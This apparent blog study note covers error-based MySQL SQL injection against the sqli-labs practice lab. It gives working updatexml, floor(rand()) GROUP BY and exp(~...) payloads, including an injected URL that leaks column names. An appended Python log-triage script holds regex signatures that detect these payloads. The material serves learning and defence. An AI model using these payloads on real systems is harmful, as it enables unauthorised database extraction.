8.23 SQL Injection: Error-Based Injection

1.updatexml

updatexml(1,concat(0x7e,(select version()),0x7e),1);
updatexml(1,concat(0x7e,(select user()),0x7e),1);
http://localhost/sqli-labs/Less-1/?id=1' and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='emails'),0x7e),1) -- -

2.floor
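Principle: a conflict between rand() and ORDER BY or GROUP BY. rand() is evaluated again while the grouping builds its temporary table, so a duplicate-key error is raised and the error message carries the concatenated value.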

(select 1 from(select count(*),concat((select (select(select concat(0x7e,version(),0x7e))) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)%23
version() can be replaced with user()/database()...

3.exp

exp(~(select * from (select user())x))%23#
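
A defensive counterpart to the three payload shapes above, added here as an example and not part of the original post: a log-triage script that URL-decodes request lines and flags the updatexml, floor(rand()) with GROUP BY/ORDER BY, and exp(~...) patterns. The log lines are constructed, and the names SIGNATURES, normalise, classify and scan are assumptions of this example.

```python
import re
from urllib.parse import unquote_plus

# Optional / required separators: whitespace or inline /* */ comments.
_GAP = r"(?:\s|/\*.*?\*/)*"
_SEP = r"(?:\s|/\*.*?\*/)+"

# One signature per error-based technique shown on this page.
SIGNATURES = {
    "updatexml": re.compile(rf"\bupdatexml{_GAP}\(", re.I | re.S),
    "floor-rand": re.compile(
        rf"\bfloor{_GAP}\({_GAP}rand{_GAP}\(.*?\).*?\b(?:group|order){_SEP}by\b",
        re.I | re.S),
    "exp-overflow": re.compile(rf"\bexp{_GAP}\({_GAP}~", re.I | re.S),
}

# Constructed access-log request lines (not captured traffic).
SAMPLE_LOG = [
    "GET /sqli-labs/Less-1/?id=1 HTTP/1.1",
    "GET /sqli-labs/Less-1/?id=1%27%20and%20updatexml(1,concat(0x7e,(select%20version()),0x7e),1)%20--%20- HTTP/1.1",
    "GET /sqli-labs/Less-1/?id=1%27%20and%20(select%201%20from(select%20count(*),concat(version(),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)%23 HTTP/1.1",
    "GET /sqli-labs/Less-1/?id=1%27%20and%20EXP(~(select%20*%20from%20(select%20user())x))%23 HTTP/1.1",
    "GET /docs/floor-plan?group=by-room HTTP/1.1",
]

def normalise(raw, max_rounds=3):
    """URL-decode repeatedly so double encoding (%2527) is unwrapped."""
    for _ in range(max_rounds):
        decoded = unquote_plus(raw)
        if decoded == raw:
            break
        raw = decoded
    return raw

def classify(request_line):
    """Return the names of all signatures found in one request line."""
    text = normalise(request_line)
    return [name for name, rx in SIGNATURES.items() if rx.search(text)]

def scan(lines):
    """Map line index -> matched technique names, skipping clean lines."""
    return {i: hits for i, line in enumerate(lines) if (hits := classify(line))}

if __name__ == "__main__":
    for idx, hits in scan(SAMPLE_LOG).items():
        print(idx, hits, SAMPLE_LOG[idx][:60])
```

A hit is a triage signal only; the fix for the underlying flaw is parameterised queries and not returning database error text to the client.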

posted @ 2023-08-23 21:58  N0zoM1z0